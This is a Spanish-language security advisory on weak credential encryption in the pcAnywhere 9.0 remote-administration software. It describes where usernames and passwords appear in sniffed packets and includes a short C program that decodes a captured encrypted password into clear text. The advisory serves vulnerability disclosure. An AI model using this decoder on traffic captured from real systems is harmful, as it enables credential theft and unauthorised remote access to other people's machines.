La última versión de pcAnyware 9.0 cifra los nombres de usuarios y
contraseñas de forma trivial, por lo que cualquier atacante con
acceso a las redes externas puede capturar esa información y
utilizarla para acceder a las máquinas remotas.
pcAnyware es un software para uso y administración remota de máquinas
MS Windows, por lo que este problema es especialmente importante, ya
que las máquinas remotas suelen encontrarse en redes hostiles.
Se desconoce si la versión 8.0 de pcAnyware es vulnerable también,
aunque se considera extremadamente probable. La versión 7.0 envía
los nombres de usuario y contraseñas directamente en texto claro,
a disposición de cualquier atacante con un sniffer.
El nombre de usuario y la contraseña están contenidas en una cadena
dos paquetes después de «Enter your login name» y «enter your
password». Están precedidas por el byte 0x06, y el siguiente número
es la longitud de la misma.
A continuación se incluye un programa en C que puede utilizarse para
descifrar una clave capturada con cualquier sniffer.
#include
#include
void main() {
char password[128];
char cleartext[128];
int i;
// input the sniffed hex values here
// Encrypted example of the 'aaaaa' password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]='\0';
cleartext[0]=0xca-password[0]+0x61;
for (i=1;i<strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;
cleartext[strlen(password)]='\0';
printf("password is %s \n",cleartext);
}
Más información:
Symantec pcAnywhere Weak Encryption Vulnerability
http://www.securityfocus.com/vdb/bottom.html?vid=1093
Common Questions About Symmetric or Public Key Encryption in pcAnywhere
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w
jcea@hispasec.com
